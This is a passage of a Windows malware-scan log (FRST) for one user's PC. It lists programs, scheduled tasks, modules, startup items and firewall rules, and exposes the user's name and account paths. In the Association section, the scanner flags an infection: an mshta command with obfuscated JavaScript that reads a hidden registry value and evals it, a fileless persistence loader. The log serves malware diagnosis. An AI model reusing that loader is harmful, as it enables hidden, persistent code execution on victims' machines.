(HKLM-x32\...\{57f97356-8f1d-45cf-a325-9de4c0896ced}) (Version: 2.0.19.17620 - Screaming Bee) ScriptVOX Studio (x32 Version: 2.0.19.17620 - Screaming Bee) Hidden SDU version 3.8 (HKLM-x32\...\{A23B547D-36B0-4B85-B68A-AADF6C9A723B}_is1) (Version: 3.8 - ) SketchUp 2016 (HKLM\...\{E2B66CF6-ABA0-4E5F-B426-7478B18301AE}) (Version: 16.1.1449 - Trimble Navigation Limited) SMART Common Files (HKLM-x32\...\{ED2455F7-6AA6-4D3C-85E9-A72297DD7051}) (Version: 11.0.246.0 - SMART Technologies ULC) SpellQuizzer 1.4.2 (HKLM-x32\...\SpellQuizzer_is1) (Version: - TedCo Software) Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.) Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 3.1.0.0 - Splashtop Inc.) Spotify (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Spotify) (Version: 1.0.34.146.g28f9eda2 - Spotify AB) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.107 - Synaptics Incorporated) Synthesia (HKLM-x32\...\Synthesia) (Version: 10.2 - Synthesia LLC) SynthFont (HKLM-x32\...\SynthFont) (Version: - ) The Project SkyHigh MD-80 Base pack for FS2004 (HKLM-x32\...\The Project SkyHigh MD-80 Base pack for FS2004) (Version: - ) UK2000 Heathrow Free FSX (HKLM-x32\...\UK2000 Heathrow Free FSX) (Version: 3.0 - UK2000 Scenery) Unity Web Player (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS) Universal Extractor 1.6.1 (HKLM-x32\...\Universal Extractor_is1) (Version: 1.6.1 - Jared Breland) Verizon Internet Security Suite (HKLM-x32\...\MSC) (Version: 15.0.166 - McAfee, Inc.) Vz In-Home Agent (HKLM-x32\...\VzInHomeAgent) (Version: 9.0.76.0 - Verizon) VzDownloadManager (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\VzDownloadManager) (Version: 2.0.0.24 - Verizon) Windows 10 Upgrade Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17354 - Microsoft Corporation) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) Wirecast (HKLM\...\{13CCAC84-0C34-4D13-8C99-02D9F8B4C714}) (Version: 6.0.6 - Telestream LLC) Works Suite OS Pack (x32 Version: 1.0.0.0000 - Microsoft Corporation) Hidden Works Synchronization (x32 Version: 1.0.0.0000 - Your Company Name) Hidden XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-23814709-2432651133-2868963390-1010_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\banie_000\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-23814709-2432651133-2868963390-1010_Classes\CLSID\{A416C15B-A073-4994-8DB5-87527A41B2FA}\localserver32 -> C:\Program Files\Telestream\Wirecast\Wirecast.exe (Telestream LLC) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0595F72E-12EE-4108-9DD3-980B0523E243} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {0911E052-05E2-43ED-B926-9AF86A085037} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-09-17] (Microsoft Corporation) Task: {0A7D88E8-273E-4249-AFBD-5DE99EAD2230} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {0B99FE8E-5C4E-4FBF-B2E5-18CF682E65BA} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-30] (Google Inc.) Task: {12567C4C-6275-49A6-94D2-85BA90A7E4BB} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {13FF8C06-FE50-49A8-8BF7-55D5996E002F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-11-16] (Piriform Ltd) Task: {14723927-21E7-4192-AA2E-8A7BB96BF694} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: {14934DB7-80E7-4945-BA3E-BB6493EFAEED} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-10-13] (Microsoft Corporation) Task: {1961BC23-D3DE-42A8-A9D3-40B225A9D03A} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-06-18] (CyberLink Corp.) Task: {197C010B-A014-4D1D-B300-74902522D0B1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {1DA5565F-E46B-4E04-A4B4-AAED3B871D30} - System32\Tasks\{7710BCDD-6C09-4CB1-A71B-FCC26146EBCA} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\fsx.exe" -d "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X" Task: {1DC567B9-5191-41F9-A428-730C87480BB1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company) Task: {1F6A8E16-185C-4D5C-A509-6E22FF483A41} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.) Task: {21E0A627-873B-485D-9686-D30155D725EE} - System32\Tasks\{7D00BB86-2DF0-4DAB-B9C2-C93C1A87D27D} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Works\msworks.exe" -d "C:\Program Files (x86)\Microsoft Works\" Task: {21F20494-8293-4836-9B4B-CE2666CF6C8F} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {236E1606-C3C5-4DE0-A2CB-3B2AC55430FB} - System32\Tasks\{E0ECFA91-F43E-4FDF-B737-56F17C718F89} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\fsx.exe" -d "C:\Program Files (x86)\Microsoft Games\Microsoft Flight Simulator X\" Task: {248F194E-04D3-4120-8D3F-E5C8F901FF62} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.) Task: {2695FA5C-E58D-4257-A062-A17BC7246BD0} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1002 -> No File <==== ATTENTION Task: {346BF31E-4312-491E-B039-DFA8EAEBD295} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft) Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {3765453C-8732-4387-85C7-D009F2034F5F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {3ABC9794-23A7-449A-8D9C-5BEAFDBEAD7E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [2015-04-30] (Google Inc.) Task: {3FB3E07E-E3DC-4966-841B-BA67461EF69E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {3FE66C65-90C0-4CA3-901E-D0F21C574A09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated) Task: {40307EAD-6B8C-4B91-B4C8-89F055335924} - System32\Tasks\HPCustParticipation HP ENVY 7640 series => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [2014-08-22] (Hewlett-Packard Development Company, LP) Task: {46E1B886-D881-4709-BBB6-E48C1EF3F385} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-01-21] (Hewlett-Packard) Task: {656DFAA8-4CC6-43EF-A04A-C010E30EE928} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation) Task: {6ADCC82D-62D3-40BC-88D6-F88E827ACFBA} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-07-07] (McAfee, Inc.) Task: {6E5BDD10-B113-47F4-8567-429734B8802A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company) Task: {778288B3-024B-421B-BE1C-CBE64A0EC259} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-11] (Adobe Systems Incorporated) Task: {8205452E-A6BF-4CC3-BBE8-7070E746F533} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {89669F5C-437E-45EA-B340-11C685DD5B38} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-05-18] (McAfee, Inc.) Task: {8A7A62FD-42C5-46F4-8097-0D102A1134AD} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {8F0C60FA-4D83-4693-A133-73DA5C0B6E9A} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {8FBCD0AE-A33A-4B4C-BA23-D57452400BD2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {923970B7-2E94-4C0B-92E6-B5F8F234DDAD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-06-03] (Hewlett-Packard Company) Task: {92EA0108-97C5-48B6-A01E-4EF66F48DCB2} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {9A1DC356-8C33-4D38-ADCA-12845321603C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-04-19] (Google Inc.) Task: {A74089B4-6591-4237-BE6D-61566D172504} - System32\Tasks\McAfee\McAfee Idle Detection Task Task: {ACEF0F3E-9BE0-428E-BC43-B436A311C240} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {ADE00F7A-FE8C-4F0C-BD02-D6D8205EDFC8} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-16] (McAfee, Inc.) Task: {AEBC615D-C7F4-49C7-A82A-63E5E1A57BEE} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1010 -> No File <==== ATTENTION Task: {B5253617-41AE-413C-A54A-4C7DD1B08BE6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard) Task: {C722424F-B46A-48C3-B68A-AF41A9637D67} - System32\Tasks\NCH Software\PrismDowngrade => C:\Users\Kyle Aniel\AppData\Roaming\NCH Software\Program Files\Prism\prism.exe [2016-07-28] (NCH Software) Task: {CC2CDB61-4621-4142-96AC-17D14CA7A2B6} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent Task: {D25DD6D3-0386-4B83-B8E5-66CBE076446B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\MRT.exe [2016-10-13] (Microsoft Corporation) Task: {D8FD2928-953B-4539-9562-E5B1A70CD61C} - System32\Tasks\{5F1B02E2-90C4-4F55-850F-B56519014C3E} => pcalua.exe -a "C:\Program Files\FlightGear 3.2.0\unins000.exe" -d "C:\Program Files\FlightGear 3.2.0" Task: {E347EDD3-B535-424A-84DE-3F77F7AD3B1C} - \WPD\SqmUpload_S-1-5-21-23814709-2432651133-2868963390-1001 -> No File <==== ATTENTION Task: {E9290A7E-B4F8-4290-BACB-B8A565D2080E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {F448E5DD-AD8C-4DED-8DC4-5A002721A697} - System32\Tasks\HPCeeScheduleForKYLE-PC$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard) Task: {F56C18F6-B7C3-4A27-B765-54B1164A7F89} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-10-08] (Microsoft Corporation) Task: {FC336EBD-83F7-4457-B42E-660E62254C26} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2014-05-19] (Hewlett-Packard Development Company, L.P.) Task: {FDA7C8B4-CF42-4418-A7C1-9F674EA1B267} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForbanie_000.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Ready For Pushback Boeing 747-200v2 FS2004\simpilot.com.lnk -> hxxp://simpilot.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Ready For Pushback Boeing 747-200v2 FS2004\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\POSKY Embraer ERJ 145\www.projectopensky.com.lnk -> hxxp://www.projectopensky.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\POSKY Embraer ERJ 145\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Posky Boeing 737-800 Okay Airways FSX\www.projectopensky.com .lnk -> hxxp://www.projectopensky.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\Posky Boeing 737-800 Okay Airways FSX\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\FSND McDonell-Douglas MD-83 FSX\www.rikoooo.com.lnk -> hxxp://www.rikoooo.com/ Shortcut: C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons\FSND McDonell-Douglas MD-83 FSX\www.simviation.com fsnd.lnk -> hxxp://www.simviation.com/fsnd/ ==================== Loaded Modules (Whitelisted) ============== 2016-07-16 04:42 - 2016-07-16 04:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2014-03-28 13:31 - 2014-03-28 13:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll 2014-03-28 13:27 - 2014-03-28 13:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll 2014-03-28 13:27 - 2014-03-28 13:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll 2014-03-28 13:27 - 2014-03-28 13:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll 2014-03-28 13:48 - 2014-03-28 13:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll 2014-03-28 13:48 - 2014-03-28 13:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll 2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2016-09-25 20:48 - 2016-10-13 14:48 - 10220624 _____ () C:\Program Files\Gramblr\gramblr.exe 2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-03-14 14:55 - 2016-10-08 00:52 - 08923840 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll 2014-03-28 13:36 - 2014-03-28 13:36 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe 2016-09-16 05:02 - 2016-09-16 05:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2016-10-13 15:28 - 2016-10-05 02:21 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-10-13 15:28 - 2016-10-05 02:13 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-10-13 15:28 - 2016-10-05 02:14 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-09-28 05:05 - 2016-09-28 05:05 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2016-09-28 05:05 - 2016-09-28 05:05 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2016-09-28 05:05 - 2016-09-28 05:05 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ () C:\Users\Kyle Aniel\Downloads\AirMouse.exe 2015-07-10 06:16 - 2015-07-10 06:16 - 00117920 ____N () C:\Program Files\WindowsApps\Microsoft.ZuneMusic_3.6.25021.0_x64__8wekyb3d8bbwe\GNSDK_FP.DLL 2016-08-15 17:30 - 2016-08-15 17:31 - 00017408 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe 2016-08-15 17:30 - 2016-08-15 17:31 - 13475840 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll 2016-06-03 00:55 - 2016-06-03 01:01 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll 2016-03-03 21:15 - 2016-03-03 21:17 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll 2016-08-26 11:30 - 2016-08-26 11:30 - 04746240 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\Time.exe 2016-08-26 11:30 - 2016-08-26 11:30 - 01413120 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\TimeBackground.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll 2014-12-26 11:02 - 2014-12-04 19:27 - 00055688 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll 2014-12-26 11:02 - 2014-12-04 19:27 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll 2016-09-17 05:57 - 2016-09-17 05:57 - 01383616 _____ () C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll 2014-08-11 09:06 - 2013-12-10 08:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] AlternateDataStreams: C:\ProgramData\Temp:74603393 [144] ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Classes\5623e: "C:\WINDOWS\system32\mshta.exe" "javascript:i8S1mD="m";n40z=new ActiveXObject("WScript.Shell");fuLa2="SrL4";f81HSI=n40z.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");mrBn9="j1V1";eval(f81HSI);adKr6SBm="t0nh";" <===== ATTENTION ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE restricted site: HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\youtube.com -> www.youtube.com ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 06:25 - 2013-08-22 06:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Control Panel\Desktop\\Wallpaper -> E:\Misc\IMG_9250.JPG HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == HKLM\...\StartupApproved\StartupFolder: => "Microsoft Office.lnk" HKLM\...\StartupApproved\StartupFolder: => "Microsoft Works Calendar Reminders.lnk" HKLM\...\StartupApproved\Run: => "SimplePass" HKLM\...\StartupApproved\Run: => "OPBHOBroker" HKLM\...\StartupApproved\Run: => "OPBHOBrokerDesktop" HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "ADSKAppManager" HKLM\...\StartupApproved\Run32: => "ADSK DLMSession" HKLM\...\StartupApproved\Run32: => "iSkysoft Helper Compact.exe" HKLM\...\StartupApproved\Run32: => "PMBVolumeWatcher" HKLM\...\StartupApproved\Run32: => "WorksFUD" HKLM\...\StartupApproved\Run32: => "Microsoft Works Portfolio" HKLM\...\StartupApproved\Run32: => "Microsoft Works Update Detection" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Skype" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Google Update" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "Power2GoExpress8" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "BlueStacks Agent" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "iFunBox" HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\StartupApproved\Run: => "MurGee.com Auto Clicker" HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [UDP Query User{53794421-7821-4278-8BBF-741BA05AB330}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{9FCA62F9-825D-496E-A932-0EED1260581B}C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kyle aniel\appdata\roaming\spotify\spotify.exe FirewallRules: [{F14C8E4E-1B46-4AAC-97D1-94D40AE20ABA}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgcom.exe FirewallRules: [{8B921A85-A429-4280-B9FB-07CB855F9AEE}] => (Allow) C:\Program Files\FlightGear 2016.2.1\bin\fgfs.exe FirewallRules: [{57F389DB-7222-4A70-83D6-662C742B15A0}] => (Allow) LPort=8317 FirewallRules: [{85C86D16-7CBD-49DB-AD69-7F297733EC65}] => (Allow) LPort=50001 FirewallRules: [{E1826D7F-6D7B-41D9-BB8B-73EFFEB1E640}] => 